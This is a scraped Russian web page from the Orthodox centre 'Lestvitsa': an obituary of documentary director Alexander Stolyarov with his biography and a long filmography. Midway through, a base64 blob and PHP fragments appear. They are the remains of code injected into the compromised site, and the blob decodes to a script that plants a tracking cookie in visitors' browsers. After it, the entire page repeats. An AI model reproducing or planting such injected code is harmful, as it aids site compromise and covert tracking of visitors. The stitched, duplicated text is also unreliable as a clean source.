Умер режиссер Александр Столяров

Царство Небесное!
26 июля в мир Горных сияний, представился известный режиссер документалист, поэт, драматург, Александр Столяров.Он был настоящим и верным другом Центра Православной культуры "Лествица".Творческая жизнь Лествицы была тесно связана с выдающимся Мастером кино.Александр Столяров творчески   поддерживал теле студию Лествицы и разделял все миссионерские направления центра."Международная Киноассамблея на Днепре" Это совместный плод Столярова и Лествицы.Он глубоко верующий православный христианин.
Все  труженники Лествицы выражают соболезнования его благоверной жене и детям. Будем молиться об упокоении новопредставленного раба Божьего Александра.Светлая ему память, Царство Небесное и вечный покой!
 
Протоиерей Игорь Собко. 
 
 
Александр Николаевич Столяров (род. 22 ноября 1959, Львов, УССР) — режиссёр телеканала «Россия-Культура», писатель, автор более 100 документальных и художественных фильмов. Номинирован на премию «НИКА» и «ТЭФИ» в 2010 году (фильм «Герман и Кармалита»).
 
Наиболее известные фильмы — «Девочки-девочки» (2007), «Понять Человека» (2009), «Старец Паисий и я, стоящий вверх ногами» (2012).
 
В сентябре 2015 года вышел сборник самых лучших рассказов писателя — «Неправильная сказка».
 
Окончил Высшие курсы сценаристов и режиссёров в Москве.
 
Основатель и художественный руководитель детского театра «Театр Андерсена».
 
 
Фильмография
«Хорал» (1988) Приз за лучшую режиссуру в Дьере (Венгрия) и в Нойбранденбурге (Германия)
«Порт» (1991)
«Союз одноногих» (1992) Приз за режиссуру в Дьере (Венгрия)
«Театр на ладонях» (ТВ 1992)
«Метрополитен» (ТВ 1992)
«Магдебургские хроники» (1994)
«Герой моего времени» (1998)
«Gloria» (1999)
«Потоп» (1999)
«Святое семейство» (2000)
«Колыбель для неродившегося ребёнка» (2000)
«За двумя зайцами — 2» (2000)
Программа «Новости» (РЕН-ТВ, Москва), главный режиссёр (2000)
«Давай убьём музыканта» (2001) Приз за драматургию им. Л. Гуревича в Екатеринбурге
«Американский репортаж» (2002)
«Достоевская девочка» (2002) Гран-при на фестивале «Покров»
«Давид» (2003)
«Безмолвие» (2003)
«Из жизни ахтырского полка» (2003)
«Салем — экспресс» (2003)
«Больше, чем любовь» (2004)
«Ольга и Рабинович» (2004)
«Блаженные в кинематографе» (2005) Приз на фестивале «Контакт»
«Чёрно-белая африка» (2005) фильм о команде путешественников «Эквитес»
«Критика любви» (2005)
«Южная столица» (2005)
«Любовь неволею судьбы» (2005)
«Я — Хармс» (2005)
«Гибель быка» (2006)
«Святитель Лука» (2006)
«Манифест женщины» (2006)
«Аскет и Лиса» (2006)
«Из жизни Венедикта Ерофеева» (2006)
«Моя жена больна шизофренией» (х/ф 2006)
«Блудный сын, блудная мать» (х/ф 2006)
«Баптисты» (2006)
«Четыре жены буревестника революции» (2007)
«Посещение музея» (2007)
«Севастопольский вальс» (2007)
«Третья любовь Клавдии Шульженко» (2007)
«Путешествие отца и сына» (2007)
«Александр Вампилов: я буду жить долго-долго…» (2007)
«Милый лжец Василий Качалов» (2007)
«Девочки, девочки» (2007) Приз «Серебряный кадр» на фестивале «Кинолетопись-2008»
Лучший документальный фильм на фестивале «Magnificat 2008»
I премия на кинофестивале «Покров»
«Митрополит Пётр Могила» (2007)
«Жизнь и кино» (2008)
«Народный святой» (2008)
«1000 поцелуев Бирона» (2008)
«Святой Петрович» (х/ф 2008)
Диплом за лучшее религиозно-духовное содержание на фестивале «Кинолетопись-2008»
Приз на фестивале «Крест святого Андрея» (Грузия, 2008)
«Портрет немолодого человека» (2008)
«Абрам да Марья» (2008)
«Казачка» (2008)
«Женитьба Алексея Петренко» (2008)
«Второе рождение» (2008)
«Монастырский остров» (2008)
«Лу Саломе. Жизнь без любви» (2009)
«Татьяна» (2009)
«Жизнь сардин минус электрификация всей страны» (2009)
«Театральный роман Богдана Ступки» (2009)
«Понять человека» (2009) Гран-при на фестивале «Покров-2010»
«Сказка для великого князя» (2009)
«Путешествие в Коктебель» (2009)
«Я — Моцарт» (2010)
«День святого Николая. Композиция № 84» (2010)
«Герман и Кармалита» (2010) Номинация «ТЭФИ» и Номинация «НИКА»
«Путешествие молодого композитора. Композиция № 85» (2010)
«Похороны Петра. Композиция № 86» (2010)
«Друг мой, Михаил Бондаренко. 12 лет назад и сегодня. Композиция № 87» (2010)
«Обыкновенный гений» (2010)
«Благовещение. Композиция № 88» (2010)
«Ираклий+Нана=Кино» (2010)
«Партитура. Soli Deo Gloria» (2010)
«Моцарт. Концерт для скрипки с оркестром № 5» (2010)
«Святое семейство по Карлу Марксу» (2010)
«Востребованный Адабашьян. Уроки режиссуры» (2010)
«Красное и белое» (2010)
«Театр Захер-Мазоха» (2010)
«Принц на горошине» (2010)
«Старые письма» (2010)
«Дело России» (2010)
«И вся её жизнь…» (2011)
«Любовь как постоянная величина» (2011)
«Моё прибытие поезда» (2011)
«Полёт в нелётную погоду» (2011)
«Очи чёрные» (2011)
«Необыкновенное чудо» (2011)
«Письма с неба» (2011)
«Знаки препинания» (2011)
«После Пушкина» (2011)
«Проза любви» (2011)
«Посвящение» (2011)
«Чтобы не забыли» (2011)
«Актриса и неврастеник» (2011)
«Господин премьер-министр» (2011)
«Напряжение нежности» (2012)
«Скрипка для Ван Гога» (2012)
«Дело Зборовского» (2012)
«Старец Паисий и я, стоящий вверх ногами» (х/ф 2012)
«В Москву, в Москву» (2012)
«Зинаида Гиппиус» (2012)
«Новые светочи России» (2012)
«Память плоти» (2013)
«Последний рассказ» (2013)
«Ave Maria» (2013)
«9 стихотворений. Групповой портрет» (2013)
«Поэза о Рыбаке и Рыбке» (2013)
«Памятник Параджанову» (2013)
«Свой человек на Соловках» (2013)
«Диккенс» (2013)
«Шесть маленьких шедевров» (2013)
«Монастырь» (Фильм о Свято-Покровской Голосеевской Пустыни) (2014)
 
Раздел: 
aG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?> Умер режиссер Александр Столяров | Центр православной культуры Лествица

Умер режиссер Александр Столяров

Царство Небесное!
26 июля в мир Горных сияний, представился известный режиссер документалист, поэт, драматург, Александр Столяров.Он был настоящим и верным другом Центра Православной культуры "Лествица".Творческая жизнь Лествицы была тесно связана с выдающимся Мастером кино.Александр Столяров творчески   поддерживал теле студию Лествицы и разделял все миссионерские направления центра."Международная Киноассамблея на Днепре" Это совместный плод Столярова и Лествицы.Он глубоко верующий православный христианин.
Все  труженники Лествицы выражают соболезнования его благоверной жене и детям. Будем молиться об упокоении новопредставленного раба Божьего Александра.Светлая ему память, Царство Небесное и вечный покой!
 
Протоиерей Игорь Собко. 
 
 
Александр Николаевич Столяров (род. 22 ноября 1959, Львов, УССР) — режиссёр телеканала «Россия-Культура», писатель, автор более 100 документальных и художественных фильмов. Номинирован на премию «НИКА» и «ТЭФИ» в 2010 году (фильм «Герман и Кармалита»).
 
Наиболее известные фильмы — «Девочки-девочки» (2007), «Понять Человека» (2009), «Старец Паисий и я, стоящий вверх ногами» (2012).
 
В сентябре 2015 года вышел сборник самых лучших рассказов писателя — «Неправильная сказка».
 
Окончил Высшие курсы сценаристов и режиссёров в Москве.
 
Основатель и художественный руководитель детского театра «Театр Андерсена».
 
 
Фильмография
«Хорал» (1988) Приз за лучшую режиссуру в Дьере (Венгрия) и в Нойбранденбурге (Германия)
«Порт» (1991)
«Союз одноногих» (1992) Приз за режиссуру в Дьере (Венгрия)
«Театр на ладонях» (ТВ 1992)
«Метрополитен» (ТВ 1992)
«Магдебургские хроники» (1994)
«Герой моего времени» (1998)
«Gloria» (1999)
«Потоп» (1999)
«Святое семейство» (2000)
«Колыбель для неродившегося ребёнка» (2000)
«За двумя зайцами — 2» (2000)
Программа «Новости» (РЕН-ТВ, Москва), главный режиссёр (2000)
«Давай убьём музыканта» (2001) Приз за драматургию им. Л. Гуревича в Екатеринбурге
«Американский репортаж» (2002)
«Достоевская девочка» (2002) Гран-при на фестивале «Покров»
«Давид» (2003)
«Безмолвие» (2003)
«Из жизни ахтырского полка» (2003)
«Салем — экспресс» (2003)
«Больше, чем любовь» (2004)
«Ольга и Рабинович» (2004)
«Блаженные в кинематографе» (2005) Приз на фестивале «Контакт»
«Чёрно-белая африка» (2005) фильм о команде путешественников «Эквитес»
«Критика любви» (2005)
«Южная столица» (2005)
«Любовь неволею судьбы» (2005)
«Я — Хармс» (2005)
«Гибель быка» (2006)
«Святитель Лука» (2006)
«Манифест женщины» (2006)
«Аскет и Лиса» (2006)
«Из жизни Венедикта Ерофеева» (2006)
«Моя жена больна шизофренией» (х/ф 2006)
«Блудный сын, блудная мать» (х/ф 2006)
«Баптисты» (2006)
«Четыре жены буревестника революции» (2007)
«Посещение музея» (2007)
«Севастопольский вальс» (2007)
«Третья любовь Клавдии Шульженко» (2007)
«Путешествие отца и сына» (2007)
«Александр Вампилов: я буду жить долго-долго…» (2007)
«Милый лжец Василий Качалов» (2007)
«Девочки, девочки» (2007) Приз «Серебряный кадр» на фестивале «Кинолетопись-2008»
Лучший документальный фильм на фестивале «Magnificat 2008»
I премия на кинофестивале «Покров»
«Митрополит Пётр Могила» (2007)
«Жизнь и кино» (2008)
«Народный святой» (2008)
«1000 поцелуев Бирона» (2008)
«Святой Петрович» (х/ф 2008)
Диплом за лучшее религиозно-духовное содержание на фестивале «Кинолетопись-2008»
Приз на фестивале «Крест святого Андрея» (Грузия, 2008)
«Портрет немолодого человека» (2008)
«Абрам да Марья» (2008)
«Казачка» (2008)
«Женитьба Алексея Петренко» (2008)
«Второе рождение» (2008)
«Монастырский остров» (2008)
«Лу Саломе. Жизнь без любви» (2009)
«Татьяна» (2009)
«Жизнь сардин минус электрификация всей страны» (2009)
«Театральный роман Богдана Ступки» (2009)
«Понять человека» (2009) Гран-при на фестивале «Покров-2010»
«Сказка для великого князя» (2009)
«Путешествие в Коктебель» (2009)
«Я — Моцарт» (2010)
«День святого Николая. Композиция № 84» (2010)
«Герман и Кармалита» (2010) Номинация «ТЭФИ» и Номинация «НИКА»
«Путешествие молодого композитора. Композиция № 85» (2010)
«Похороны Петра. Композиция № 86» (2010)
«Друг мой, Михаил Бондаренко. 12 лет назад и сегодня. Композиция № 87» (2010)
«Обыкновенный гений» (2010)
«Благовещение. Композиция № 88» (2010)
«Ираклий+Нана=Кино» (2010)
«Партитура. Soli Deo Gloria» (2010)
«Моцарт. Концерт для скрипки с оркестром № 5» (2010)
«Святое семейство по Карлу Марксу» (2010)
«Востребованный Адабашьян. Уроки режиссуры» (2010)
«Красное и белое» (2010)
«Театр Захер-Мазоха» (2010)
«Принц на горошине» (2010)
«Старые письма» (2010)
«Дело России» (2010)
«И вся её жизнь…» (2011)
«Любовь как постоянная величина» (2011)
«Моё прибытие поезда» (2011)
«Полёт в нелётную погоду» (2011)
«Очи чёрные» (2011)
«Необыкновенное чудо» (2011)
«Письма с неба» (2011)
«Знаки препинания» (2011)
«После Пушкина» (2011)
«Проза любви» (2011)
«Посвящение» (2011)
«Чтобы не забыли» (2011)
«Актриса и неврастеник» (2011)
«Господин премьер-министр» (2011)
«Напряжение нежности» (2012)
«Скрипка для Ван Гога» (2012)
«Дело Зборовского» (2012)
«Старец Паисий и я, стоящий вверх ногами» (х/ф 2012)
«В Москву, в Москву» (2012)
«Зинаида Гиппиус» (2012)
«Новые светочи России» (2012)
«Память плоти» (2013)
«Последний рассказ» (2013)
«Ave Maria» (2013)
«9 стихотворений. Групповой портрет» (2013)
«Поэза о Рыбаке и Рыбке» (2013)
«Памятник Параджанову» (2013)
«Свой человек на Соловках» (2013)
«Диккенс» (2013)
«Шесть маленьких шедевров» (2013)
«Монастырь» (Фильм о Свято-Покровской Голосеевской Пустыни) (2014)
 
Раздел: